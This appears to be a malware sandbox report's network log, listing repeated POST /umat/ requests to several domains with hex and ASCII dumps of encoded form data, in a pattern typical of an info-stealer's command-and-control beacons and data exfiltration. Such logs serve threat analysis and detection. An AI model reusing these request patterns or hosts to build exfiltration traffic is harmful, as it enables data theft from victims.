            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.drivetrianrepair.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.drivetrianrepair.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drivetrianrepair.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 70 67 66 38 43 4b 65 76 71 39 33 62 37 30 4d 54 67 46 37 48 4c 73 6c 52 61 4a 28 35 7e 76 76 34 66 70 63 31 6f 49 6e 30 6d 6d 67 43 69 52 39 68 37 6c 32 6e 52 77 72 53 53 42 76 70 7a 73 56 47 74 44 52 64 54 76 47 79 49 5a 65 4e 4e 6e 57 59 6a 76 6e 36 34 66 54 51 55 46 4f 42 57 6a 69 35 72 58 7a 34 52 45 68 53 54 4f 61 71 44 4c 66 69 7e 48 6b 37 49 54 38 53 35 66 44 32 6e 7a 49 45 4b 79 42 59 30 77 52 73 7e 64 52 43 44 65 79 73 45 55 73 7a 75 43 47 68 4d 43 6c 43 38 34 6e 32 57 36 42 58 35 7a 36 75 43 4f 30 61 6d 6e 74 77 34 42 6e 39 4e 56 75 76 4b 66 43 70 6e 41 34 78 73 32 28 35 6f 54 38 63 38 67 49 56 4c 78 74 75 36 6d 61 4a 6c 57 6a 37 73 4d 6e 76 4d 57 71 76 6e 31 43 47 34 43 79 67 37 74 63 69 42 2d 43 35 62 45 56 46 59 79 4e 65 6a 36 41 2d 49 66 49 37 36 43 56 65 30 74 37 76 66 4c 28 36 39 77 49 35 52 34 69 75 31 70 42 65 54 42 34 6d 74 63 34 75 73 48 41 2d 79 4a 51 77 41 4b 79 6d 4b 78 58 4d 78 56 57 33 68 72 71 65 71 5a 57 39 7a 5f 6c 62 35 53 50 37 68 75 47 44 31 5f 46 53 58 53 38 68 65 35 4e 72 63 62 64 59 66 4c 79 54 56 54 53 49 41 33 50 63 4b 36 6b 53 4b 5f 58 44 45 4a 63 78 57 65 6e 71 4a 50 28 37 5a 77 74 46 4e 6c 76 37 34 48 68 7a 63 6c 54 43 6b 4e 75 7a 48 53 74 41 74 44 39 61 37 75 77 4e 6c 5a 67 75 65 70 54 5a 67 54 31 5a 75 68 43 5f 62 54 54 35 57 33 54 32 44 5f 78 4a 4b 59 46 63 30 32 43 33 5a 46 6c 68 7a 35 30 55 79 2d 65 62 4f 79 4f 55 6f 30 46 74 79 6b 55 52 4f 66 6a 66 4c 73 38 73 70 2d 4f 4d 33 46 6c 35 6e 74 35 53 37 47 41 7a 45 2d 64 41 54 4e 77 4c 50 4c 56 4c 43 4a 66 6d 56 39 52 48 35 32 7e 6f 39 55 44 59 4b 53 63 4c 38 6a 55 58 4a 69 78 4b 6d 6c 42 2d 34 5f 28 54 39 54 62 58 70 77 69 56 62 31 6f 41 53 4b 53 4d 63 71 6f 64 6f 45 39 4c 62 30 37 76 68 74 79 69 55 68 74 5a 4c 78 68 49 74 62 63 4b 72 66 5a 78 4a 51 54 5a 39 6b 41 6f 69 6e 76 77 6d 7a 4c 4b 73 76 56 78 5a 59 67 4d 73 36 56 69 52 54 55 48 36 76 6e 4a 62 62 44 6f 53 54 4e 42 53 6b 62 33 72 79 65 34 56 41 50 38 50 46 56 4f 53 6e 45 36 45 50 65 50 7e 44 73 79 39 47 6c 39 62 4d 31 73 77 46 6b 46 7e 5f 74 67 39 59 45 61 79 6b 46 64 43 58 65 42 4d 30 55 65 4a 71 66 50 65 78 4f 45 4c 55 61 53 33 69 28 30 76 36 45 41 52 58 7a 41 4c 6e 67 56 45 70 56 35 61 35 33 38 4b 47 76 30 72 77 5a 65 34 4f 33 79 35 5a 38 72 4e 33 4b 59 77 4b 43 52 56 39 7e 53 6a 71 39 5f 49 72 6c 47 79 55 39 5f 58 6b 49 77 44 4a 76 43 42 36 49 47 31 6e 53 66 64 35 58 37 50 46 59 49 35 70 77 34 74 42 4b 76 35 72 4f 35 53 38 4d 46 36 70 57 6b 48 50 68 68 38 70 37 55 64 6b 61 74 7e 34 57 44 33 51 32 77 67 30 7a 39 35 59 7e 4b 51 49 69 2d 35 42 6e 65 38
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.408wmountain.infoConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.408wmountain.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.408wmountain.info/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 78 69 4b 35 76 36 74 58 55 44 75 69 56 74 48 44 33 4c 6e 42 63 4e 50 54 42 6f 44 36 28 5a 32 75 33 37 28 47 61 30 39 54 64 73 38 33 72 47 36 71 31 69 66 31 35 77 50 4d 32 78 53 43 30 42 61 42 28 76 6f 47 64 5f 45 65 4f 6c 4f 71 73 6d 6e 4a 32 2d 52 4d 61 33 52 62 37 39 63 33 39 31 47 5a 4e 70 36 41 64 5a 78 44 39 69 6a 38 4e 48 37 4b 79 5f 47 63 54 4b 69 38 67 4f 4f 43 65 31 54 61 35 46 71 50 77 71 38 4d 73 49 32 57 67 38 4e 42 4a 36 72 66 48 44 43 58 6b 75 4a 32 32 4d 4f 46 7a 4d 44 47 67 35 77 6a 4f 68 4d 4e 48 6b 38 69 42 4e 55 56 7e 46 4a 61 46 4d 52 62 74 62 67 54 48 43 7e 42 69 37 52 72 6e 6f 41 70 37 4f 71 56 6c 6d 45 52 7a 41 43 48 4e 57 43 6e 79 6b 39 6e 78 51 57 37 6f 58 77 6b 4c 34 6d 32 78 37 4b 4c 64 6b 65 4a 75 39 57 42 51 62 67 52 4b 43 72 58 48 75 4d 52 57 59 47 39 53 6f 59 52 43 43 6f 61 4c 76 35 4a 55 73 59 42 30 45 54 76 49 41 32 69 45 6b 74 4b 44 69 6c 74 4c 69 4a 4b 67 45 49 4e 46 2d 73 58 63 54 32 66 78 51 37 69 32 48 6d 4e 58 6e 42 57 7e 51 7a 57 5a 66 77 62 44 64 32 6d 7a 42 38 33 61 56 57 30 62 66 78 76 44 48 78 30 77 38 41 2d 6e 32 47 66 77 4d 50 76 5a 49 37 59 67 77 48 4a 41 54 39 49 48 4a 39 4d 53 6f 4c 2d 78 57 7e 70 57 4d 53 7a 72 57 46 47 50 75 36 34 53 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bT7tPLpx=xiK5v6tXUDuiVtHD3LnBcNPTBoD6(Z2u37(Ga09Tds83rG6q1if15wPM2xSC0BaB(voGd_EeOlOqsmnJ2-RMa3Rb79c391GZNp6AdZxD9ij8NH7Ky_GcTKi8gOOCe1Ta5FqPwq8MsI2Wg8NBJ6rfHDCXkuJ22MOFzMDGg5wjOhMNHk8iBNUV~FJaFMRbtbgTHC~Bi7RrnoAp7OqVlmERzACHNWCnyk9nxQW7oXwkL4m2x7KLdkeJu9WBQbgRKCrXHuMRWYG9SoYRCCoaLv5JUsYB0ETvIA2iEktKDiltLiJKgEINF-sXcT2fxQ7i2HmNXnBW~QzWZfwbDd2mzB83aVW0bfxvDHx0w8A-n2GfwMPvZI7YgwHJAT9IHJ9MSoL-xW~pWMSzrWFGPu64Sw).
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.408wmountain.infoConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.408wmountain.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.408wmountain.info/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 78 69 4b 35 76 2d 73 4f 66 6a 7a 79 57 39 4c 67 35 64 6a 76 46 74 28 56 48 59 47 36 31 35 61 59 7a 4a 48 34 48 6c 4e 48 63 74 45 39 76 32 6d 4c 6d 77 76 54 35 78 7e 6f 73 53 32 47 7e 42 65 41 28 76 77 6b 64 5f 49 65 50 68 7a 76 73 46 65 63 32 59 4e 50 57 33 52 6a 36 39 63 2d 73 41 6e 4c 4e 70 76 76 64 5a 35 54 38 52 48 38 50 68 28 4b 6c 75 47 58 63 4b 6a 33 73 71 54 64 42 6c 66 39 35 46 43 74 77 6f 6f 4d 73 34 79 57 6d 64 64 43 4c 35 7a 59 4b 7a 43 57 68 75 4a 6a 74 64 79 37 7a 4d 48 65 67 39 77 6a 50 54 34 4e 47 33 30 69 57 4f 73 55 32 56 4a 43 42 4d 52 63 38 4c 73 43 48 43 69 4e 69 36 6b 65 6d 61 63 70 70 4f 71 51 7a 58 41 6a 28 33 75 51 4c 58 6d 2d 79 6b 35 4f 78 6b 50 6d 6f 57 64 48 44 75 69 4e 7e 2d 6d 6c 64 69 76 53 6f 64 57 46 49 72 67 77 4b 43 72 33 48 75 4d 5f 57 59 32 39 53 75 59 52 44 68 67 61 4f 50 35 4b 61 38 59 62 7a 45 53 39 4d 41 79 59 45 67 41 45 44 6a 64 58 4d 58 4a 4b 69 56 59 4e 51 4e 55 51 46 44 32 64 6e 67 37 39 39 6e 6d 4f 58 6e 42 67 7e 52 79 4c 61 73 45 62 41 73 32 6d 7e 43 45 33 57 46 57 30 55 5f 78 70 59 33 73 78 77 38 34 36 6e 33 33 69 78 2d 6a 76 5a 64 76 59 67 52 48 4a 44 6a 39 49 4c 70 38 65 56 34 32 4b 28 58 6a 49 65 4d 65 6a 6b 44 55 79 47 36 7a 44 4b 37 51 6b 49 52 59 51 48 30 67 32 50 45 4b 33 69 46 59 36 54 77 37 50 47 51 73 51 64 55 42 51 4d 50 42 54 58 74 78 62 48 61 6c 62 30 66 51 72 30 35 58 7a 55 46 56 33 33 66 32 61 72 4f 28 6d 56 65 45 58 55 54 62 43 7e 45 79 30 34 49 42 52 32 66 33 72 79 4c 54 43 4a 62 28 2d 30 4f 57 35 44 2d 58 58 35 45 58 6a 52 73 32 70 30 52 50 42 54 78 53 68 62 6b 34 53 44 45 39 5a 65 4e 45 63 75 7a 7a 46 33 78 69 49 73 6b 6d 42 4f 37 7e 59 7a 45 77 6a 35 31 75 79 77 67 5a 6f 71 58 70 63 6a 34 46 49 72 4d 66 5a 66 44 67 47 58 36 32 77 42 35 6c 64 41 42 35 58 37 7a 4a 46 56 63 53 50 4b 46 28 44 65 72 43 35 50 43 77 4e 62 51 57 79 42 51 46 45 31 77 4d 52 39 58 77 4b 4d 57 74 78 42 41 44 50 37 6d 4d 62 4d 61 77 53 28 46 56 62 68 32 57 35 61 64 71 66 53 41 66 6a 61 7a 6c 6a 6e 71 6b 54 50 47 74 56 55 53 61 38 70 37 49 63 38 65 6a 2d 35 59 4a 76 72 55 75 55 6c 30 4b 65 6e 66 63 63 6a 4f 36 4f 53 51 72 76 56 37 77 35 59 47 57 56 46 61 50 6e 6e 65 4b 53 34 4d 51 75 4d 70 70 45 49 72 4e 4a 28 38 35 46 72 32 4f 32 77 38 46 45 28 50 67 54 41 4c 75 5f 77 58 39 4c 79 68 4f 7a 69 71 72 62 52 2d 63 64 46 33 69 4c 58 72 55 46 76 48 78 50 41 33 5a 43 67 37 4d 38 45 69 50 32 4d 43 77 37 42 65 69 33 35 30 45 70 65 52 58 34 6d 4b 54 79 75 79 7e 32 45 35 41 49 41 53 64 48 6d 48 6e 56 48 76 7e 77 4f 70 79 7a 38 37 56 33 52 6b 77 76 53 59 31 32 70 77 75 5f 61 6e 57 63
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.huiyi-sui.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.huiyi-sui.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.huiyi-sui.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 37 57 4b 4b 64 35 46 45 55 64 5a 6f 58 66 42 41 57 37 66 37 49 41 6b 6c 62 42 7a 77 35 71 6b 4b 43 33 7a 51 78 42 50 5f 50 5a 41 33 54 31 64 38 79 42 4e 71 4d 51 4d 39 31 35 57 69 30 4e 46 73 4a 6c 71 67 68 42 41 59 49 45 32 78 42 66 52 64 44 48 7e 77 76 30 52 68 75 35 43 70 45 76 77 30 47 4c 32 79 54 39 76 4f 62 6c 48 56 31 39 31 43 75 64 71 4c 77 32 7e 48 76 55 48 50 42 31 56 34 51 4e 68 31 73 39 44 53 73 69 69 4f 32 37 28 61 73 49 65 4d 5a 77 6f 50 74 45 59 54 63 70 33 75 76 67 46 4c 6e 6c 79 30 67 74 48 55 55 36 67 4d 62 65 42 5f 38 36 78 34 61 4f 33 37 34 2d 52 61 4c 6a 72 70 39 49 34 73 76 4f 65 36 28 56 4a 69 77 7a 4d 5f 6b 4b 47 37 4d 32 6d 4b 69 67 69 55 35 37 48 78 77 66 6b 6a 46 46 4b 6d 56 67 73 70 6e 57 37 39 36 54 34 62 28 41 71 4a 57 4d 54 6b 48 36 71 61 71 6a 4f 41 33 36 45 4d 4d 38 58 79 49 38 33 6d 30 4e 79 50 7e 6e 33 53 4c 43 49 4a 4d 63 79 54 41 59 34 55 5a 49 38 77 39 4c 53 4c 61 5a 4c 53 55 33 51 2d 35 34 67 52 77 6c 79 49 51 75 44 54 4f 52 43 44 52 39 53 66 66 4d 54 39 39 41 56 54 37 55 7e 66 52 55 4f 41 68 6b 64 66 44 6f 64 6b 58 61 39 54 49 4b 30 4c 6d 5a 54 70 48 6f 50 66 64 39 64 38 31 45 6a 33 32 5a 49 6e 37 43 53 69 72 50 50 77 59 61 32 55 35 4e 6d 55 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bT7tPLpx=7WKKd5FEUdZoXfBAW7f7IAklbBzw5qkKC3zQxBP_PZA3T1d8yBNqMQM915Wi0NFsJlqghBAYIE2xBfRdDH~wv0Rhu5CpEvw0GL2yT9vOblHV191CudqLw2~HvUHPB1V4QNh1s9DSsiiO27(asIeMZwoPtEYTcp3uvgFLnly0gtHUU6gMbeB_86x4aO374-RaLjrp9I4svOe6(VJiwzM_kKG7M2mKigiU57HxwfkjFFKmVgspnW796T4b(AqJWMTkH6qaqjOA36EMM8XyI83m0NyP~n3SLCIJMcyTAY4UZI8w9LSLaZLSU3Q-54gRwlyIQuDTORCDR9SffMT99AVT7U~fRUOAhkdfDodkXa9TIK0LmZTpHoPfd9d81Ej32ZIn7CSirPPwYa2U5NmU9g).
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.huiyi-sui.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.huiyi-sui.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.huiyi-sui.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 37 57 4b 4b 64 38 46 53 66 39 39 78 64 76 4e 7a 59 6f 76 76 48 51 30 6e 65 78 33 46 7a 4c 59 56 47 47 44 75 38 67 7e 50 4f 59 35 7a 58 46 42 52 28 69 38 33 4d 55 41 51 74 36 79 2d 7e 39 5a 7a 4a 6c 43 43 68 42 45 59 4c 45 65 68 43 34 64 7a 44 6b 57 7a 72 55 51 59 76 35 43 30 41 74 55 56 47 4c 43 51 54 39 6e 65 62 51 62 56 31 62 78 43 6f 65 79 51 7e 32 7e 46 6e 30 57 65 46 30 70 50 51 4e 34 67 73 5f 6e 53 73 54 65 4f 77 61 50 46 6c 76 79 50 55 41 6f 57 71 45 5a 44 56 4a 36 49 76 67 41 65 6e 6c 4f 30 67 66 6a 55 56 71 41 4d 54 50 42 2d 7a 71 78 48 65 4f 33 38 76 75 64 4c 4c 69 48 6c 39 4e 41 38 36 71 57 36 7e 6c 4a 68 6d 77 63 42 79 4a 44 35 41 58 53 74 69 67 75 74 35 4b 61 33 77 61 55 6d 4d 57 53 64 4a 53 31 38 6e 56 58 58 35 7a 34 58 6e 51 71 6f 57 4d 53 62 48 36 72 37 71 67 6d 41 33 37 63 4d 44 37 62 79 4a 63 33 6c 36 74 79 4a 35 6e 33 5a 50 43 45 33 4d 64 58 45 41 59 67 69 61 36 34 77 76 4c 43 4c 4c 70 33 52 56 6e 51 6b 7a 59 67 77 30 6c 79 54 51 75 43 32 4f 55 32 54 52 4b 79 66 4e 4a 28 39 74 79 39 54 38 6b 7e 66 64 30 4f 43 36 55 5a 78 44 73 78 6f 58 62 67 6d 49 35 34 4c 6e 50 48 70 48 4d 62 66 66 4e 64 38 34 6b 69 32 78 61 74 31 36 51 37 56 6d 76 33 33 52 75 6e 6d 79 4a 37 76 67 73 66 47 77 74 7a 62 4a 57 31 72 71 49 41 32 47 74 65 71 28 77 6f 53 52 30 55 67 4c 75 42 55 52 55 4e 55 49 66 48 35 30 54 6a 66 35 46 68 65 53 58 56 37 33 53 4c 45 39 75 57 58 7e 56 51 4d 6c 69 62 47 44 52 48 41 7a 35 33 4a 32 4f 7e 50 6f 73 67 46 7a 6c 70 52 66 78 4b 75 75 76 66 42 76 58 4d 70 38 50 66 76 64 59 33 66 6f 4d 32 65 7e 30 42 63 50 38 7e 35 6e 51 56 57 69 77 73 33 28 50 6d 31 28 41 39 41 7a 33 32 6c 31 65 46 32 44 42 66 4d 59 52 69 4e 31 52 7e 41 30 45 6c 44 6f 61 4c 67 4c 62 41 44 4f 68 57 58 64 65 6e 7a 49 46 4e 70 43 35 49 73 69 71 7e 74 47 6d 63 68 44 77 59 52 32 71 50 6d 36 7a 31 75 4d 4a 6e 66 28 5f 28 31 55 4a 46 52 36 63 74 49 61 45 6e 75 73 37 4f 53 73 4d 52 4c 56 4e 41 54 28 6e 4a 61 62 71 53 57 34 56 67 45 64 33 43 46 53 46 44 41 50 76 41 50 65 5f 76 63 61 61 71 4b 44 67 67 6c 52 4e 75 6d 6a 44 6f 6f 68 65 58 5f 78 4f 48 78 63 6d 73 54 51 42 6c 32 65 74 67 67 5a 5f 67 4f 61 72 6b 31 6e 56 4b 68 63 62 4f 51 5a 53 6e 7a 41 45 28 55 73 73 31 31 4c 4d 55 46 36 37 39 38 65 39 42 41 51 41 4a 4f 79 76 7a 35 5a 77 7a 6f 58 2d 54 32 54 72 54 57 50 45 4c 50 34 4b 54 4e 62 53 43 5f 4f 71 6f 65 33 48 43 6b 69 75 71 30 75 34 37 56 49 5f 4f 6f 71 65 5a 78 4b 77 54 4a 6d 39 65 77 6f 53 45 39 75 44 53 67 64 71 61 4d 49 49 65 78 69 78 78 4d 56 41 44 49 28 38 6f 66 55 65 44 54 44 68 6d 53 63 36 56 31 4e 4e 72 5f 7a 38 75 4b 4a 6f 34 77
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.sarrafguler.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.sarrafguler.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sarrafguler.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 4b 6c 65 2d 34 67 59 63 32 6f 45 4f 37 68 30 68 7a 37 75 6c 74 71 36 4f 49 5a 7a 4b 65 59 72 57 62 79 50 37 70 66 48 4c 57 73 76 55 4b 48 6c 34 5a 42 38 69 7a 65 72 38 55 72 6a 74 34 78 48 43 6f 42 61 6b 28 74 57 67 45 57 55 57 65 58 7e 7a 47 76 68 59 53 51 72 75 33 51 6d 76 48 4d 59 6e 47 58 53 5f 4d 50 4c 36 31 79 5a 33 75 4d 4b 71 74 55 35 65 7a 55 59 33 74 6e 7e 73 42 38 48 33 6c 30 47 32 43 55 6b 39 57 74 42 41 32 5f 37 64 7e 36 38 61 43 54 36 79 4a 58 38 43 47 52 75 73 61 6c 56 5f 76 51 74 31 6d 76 41 31 44 42 67 53 63 6c 78 45 36 70 53 77 66 4d 48 6f 64 74 77 6c 48 32 4e 58 4f 48 32 51 4b 70 4a 59 7e 38 41 68 6b 34 75 73 54 45 58 50 48 4f 34 55 32 58 4c 53 5a 79 66 74 57 55 34 5f 75 4b 63 57 41 79 37 50 72 77 6b 57 53 68 72 31 28 68 72 4c 51 74 4f 43 77 6f 65 54 74 48 74 72 75 55 44 64 76 61 53 33 5a 53 76 59 33 76 78 4d 64 62 4f 72 4f 6a 6e 53 70 2d 35 78 78 4e 47 31 68 65 4e 67 32 68 4a 70 41 78 59 53 65 65 32 6a 65 56 35 68 54 53 54 49 49 45 53 38 34 72 64 68 33 4f 66 51 48 5a 77 77 70 62 47 72 4b 72 44 66 66 34 68 55 72 71 58 76 71 31 53 50 6a 30 5a 45 5a 4b 58 77 30 79 78 61 71 30 4c 45 77 53 31 61 77 6f 47 55 75 69 6e 30 51 32 75 4a 7e 38 74 5f 45 43 48 39 36 78 53 44 54 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bT7tPLpx=Kle-4gYc2oEO7h0hz7ultq6OIZzKeYrWbyP7pfHLWsvUKHl4ZB8izer8Urjt4xHCoBak(tWgEWUWeX~zGvhYSQru3QmvHMYnGXS_MPL61yZ3uMKqtU5ezUY3tn~sB8H3l0G2CUk9WtBA2_7d~68aCT6yJX8CGRusalV_vQt1mvA1DBgSclxE6pSwfMHodtwlH2NXOH2QKpJY~8Ahk4usTEXPHO4U2XLSZyftWU4_uKcWAy7PrwkWShr1(hrLQtOCwoeTtHtruUDdvaS3ZSvY3vxMdbOrOjnSp-5xxNG1heNg2hJpAxYSee2jeV5hTSTIIES84rdh3OfQHZwwpbGrKrDff4hUrqXvq1SPj0ZEZKXw0yxaq0LEwS1awoGUuin0Q2uJ~8t_ECH96xSDTg).
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.sarrafguler.comConnection: closeContent-Length: 36482Cache-Control: no-cacheOrigin: http://www.sarrafguler.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sarrafguler.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 4b 6c 65 2d 34 68 6b 4b 79 59 70 4f 33 52 49 43 79 75 4b 78 69 37 4b 49 4b 6f 48 56 41 4a 33 4e 63 41 6e 76 74 65 32 37 56 73 48 4b 42 58 4a 47 54 69 39 6b 7a 65 62 46 63 35 58 54 70 42 62 42 6f 42 43 47 28 74 43 67 48 57 39 62 66 30 71 56 46 4d 5a 58 53 77 71 62 6c 67 6e 35 52 2d 73 61 47 58 57 42 4d 50 44 71 31 44 6c 33 28 65 43 71 76 54 56 72 39 55 59 31 6b 48 76 74 4f 63 44 41 6c 31 6a 6a 43 57 41 39 44 4e 4e 41 33 63 6a 61 70 70 55 5a 61 54 36 33 66 6e 39 65 63 68 7a 64 61 6c 41 71 76 56 56 31 6d 36 77 31 4d 79 6f 53 4a 69 6c 48 79 35 53 35 62 4d 48 6c 5a 74 73 30 48 31 70 4c 4f 47 43 41 4c 59 4e 59 76 63 41 67 67 72 4f 53 46 44 69 56 42 4e 6c 34 32 58 48 72 5a 44 44 31 57 56 6b 44 35 72 4d 74 4f 78 54 6c 72 79 49 6f 56 78 71 64 33 42 72 55 51 74 4f 69 77 6f 65 39 74 45 46 72 75 53 44 64 75 37 43 33 66 79 76 48 39 5f 78 4b 48 72 4f 38 46 44 72 76 70 36 73 6d 78 50 32 6c 67 74 35 67 32 79 52 70 42 53 41 64 47 75 32 6c 61 56 34 6e 41 43 54 48 49 45 54 5a 34 76 41 38 33 39 72 51 46 4b 6f 77 75 35 75 72 47 37 44 66 52 59 68 57 6b 4b 62 47 71 31 61 4c 6a 31 46 79 5a 64 50 77 74 41 35 61 72 52 6e 45 77 69 31 61 37 49 48 67 67 58 43 4d 64 56 44 6a 77 4f 5a 54 4b 6b 32 71 30 77 6a 32 54 72 34 42 31 66 32 67 48 48 4b 4d 38 72 76 73 54 6e 4c 52 75 64 65 59 74 6d 48 50 62 66 4f 6f 4c 66 68 44 4c 43 65 4a 53 46 72 57 61 78 51 43 32 70 4d 42 30 47 50 5a 6d 4a 61 45 50 61 70 6d 55 51 5a 51 63 5a 69 52 6b 35 74 57 58 4f 66 59 28 35 73 79 50 69 61 38 71 4a 69 47 59 4d 41 74 6f 70 4c 43 77 45 50 43 68 73 75 70 66 56 63 2d 5a 68 4e 36 78 31 4f 57 65 63 46 31 6b 73 57 57 38 4a 75 47 33 56 52 61 6d 44 73 36 32 62 58 30 68 78 28 4d 50 4b 36 77 6f 77 39 54 76 48 6e 44 65 33 70 77 46 4b 30 53 76 71 5a 42 66 7a 39 48 49 65 73 37 57 31 6e 39 38 75 70 70 47 53 6d 5f 50 71 57 71 76 6e 69 79 52 66 73 58 5a 49 73 37 70 63 76 30 74 35 76 34 77 77 6e 43 48 45 74 79 44 6f 39 41 7a 6d 39 75 73 48 72 35 56 56 32 7a 34 6c 52 69 76 44 73 2d 51 2d 73 6c 7a 52 61 53 62 71 69 48 28 76 28 66 38 74 6a 76 74 36 37 79 42 4f 65 39 75 37 4b 62 4b 4e 35 75 31 33 6b 72 55 31 44 5f 68 51 50 48 53 39 57 41 49 52 37 50 43 34 59 49 46 38 69 37 4f 6e 63 30 76 70 42 7a 4f 6f 57 61 71 43 67 57 6e 71 36 44 73 6a 65 75 4d 62 46 5a 61 49 79 73 44 47 39 69 4f 53 74 6d 74 42 4a 33 74 48 75 31 36 59 6b 33 59 45 4d 62 78 33 6e 39 30 4b 66 4f 69 58 6c 77 68 63 4d 79 75 65 6d 56 6f 78 69 74 6d 73 50 39 39 48 6c 57 6f 50 59 64 49 6e 57 74 79 33 65 5f 7a 5a 46 71 79 54 49 41 4d 71 5a 67 7e 6c 70 57 42 72 54 71 63 7a 51 63 32 68 46 71 4a 66 28 67 56 72 57 57 43 43 35 6d 4b 6a
            Source: global trafficHTTP traffic detected: POST /umat/ HTTP/1.1Host: www.theflysnare.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.theflysnare.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.theflysnare.com/umat/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 54 37 74 50 4c 70 78 3d 46 41 78 58 36 54 78 6d 54 37 69 55 6d 46 52 61 45 77 6e 69 34 53 54 66 38 57 51 76 37 6e 37 77 6d 75 7a 4b 67 49 5a 71 72 4b 52 74 46 69 43 32 43 58 47 30 73 6b 72 48 45 4a 66 57 34 59 45 54 4b 56 36 65 59 7a 38 70 70 55 46 56 74 2d 7a 34 69 4d 37 50 4d 63 63 66 62 67 76 34 6b 56 59 41 62 32 4b 4f 64 42 6e 5a 5a 33 38 65 4d 34 38 4c 28 57 78 66 62 70 70 30 41 63 36 55 63 59 28 54 47 78 6c 4f 7a 51 42 73 66 51 74 74 51 33 36 46 55 54 61 6b 73 61 53 59 79 72 7e 6f 73 76 45 64 51 70 76 4f 65 45 64 6e 36 30 32 59 6a 45 78 7a 57 72 43 57 47 5a 41 62 35 76 32 62 51 36 6f 71 38 6c 6f 55 58 58 72 74 35 31 6d 4b 71 6f 62 41 67 66 4c 48 61 30 45 5a 5a 4c 66 5a 54 63 4c 62 42 50 68 6d 56 64 4e 61 39 58 30 48 4a 76 35 73 66 74 69 34 64 70 71 4a 6c 39 53 49 50 59 58 41 51 69 71 35 50 30 65 56 4b 6b 61 49 39 66 41 6f 7a 48 52 61 6e 55 4d 65 35 56 6a 63 59 4a 48 70 42 35 58 79 36 4c 55 6b 5a 77 63 63 32 69 72 78 42 4d 4d 6d 4a 50 48 32 66 4f 77 57 48 55 44 45 73 66 47 6e 57 6f 52 32 6d 31 77 7a 58 78 48 36 44 43 4a 4b 70 4d 66 58 61 75 58 41 74 55 79 4e 54 35 52 52 57 5f 56 30 51 41 30 31 6e 73 68 71 43 70 68 54 50 5f 63 62 28 32 59 67 71 62 69 43 66 79 61 4c 49 65 37 46 38 57 53 37 52 50 45 6a 7a 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bT7tPLpx=FAxX6TxmT7iUmFRaEwni4STf8WQv7n7wmuzKgIZqrKRtFiC2CXG0skrHEJfW4YETKV6eYz8ppUFVt-z4iM7PMccfbgv4kVYAb2KOdBnZZ38eM48L(Wxfbpp0Ac6UcY(TGxlOzQBsfQttQ36FUTaksaSYyr~osvEdQpvOeEdn602YjExzWrCWGZAb5v2bQ6oq8loUXXrt51mKqobAgfLHa0EZZLfZTcLbBPhmVdNa9X0HJv5sfti4dpqJl9SIPYXAQiq5P0eVKkaI9fAozHRanUMe5VjcYJHpB5Xy6LUkZwcc2irxBMMmJPH2fOwWHUDEsfGnWoR2m1wzXxH6DCJKpMfXauXAtUyNT5RRW_V0QA01nshqCphTP_cb(2YgqbiCfyaLIe7F8WS7RPEjzw).
